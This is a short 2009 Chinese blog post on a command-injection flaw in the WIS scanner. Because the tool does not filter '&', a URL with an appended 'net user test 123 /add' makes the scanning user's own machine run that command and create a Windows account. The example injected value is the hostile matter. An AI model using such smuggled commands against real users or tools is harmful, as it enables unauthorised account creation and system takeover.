小榕的WIS漏洞补充篇及利用篇
发表于:2009年12月10日 - 作者:admin - 累计查看:318次 本月:1次 本周:1次 收藏:0次
问题的产生
1.&用来连接两条Dos命令,就是cmd.exe 会把&前后的命令分开两句来执行
2.wis这个工具没有过滤&
所以在
你用这个工具去扫描别人的时候就会出问题
正常情况下是
你的cmd.exe下执行wis http://www.xx.com/?xx.asp?id=123
没什么问题
如果碰到
http://www.xx.com/?xx.asp?id=123&net user test 123 /add
的时候就变成你的cmd.exe执行
wis http://www.xx.com/?xx.asp?id=123&net user test 123 /add
看清楚了
这个语句中有一个&,所以相当于
wis http://www.xx.com/?xx.asp?id=123
net user test 123 /add
也就是在你的机器上执行了两个语句……
wis http://www.xx.com/?xx.asp?id=123
没问题,执行后半句的时候就来问题了,增加用户了
那你机器上当然添加了一个帐号了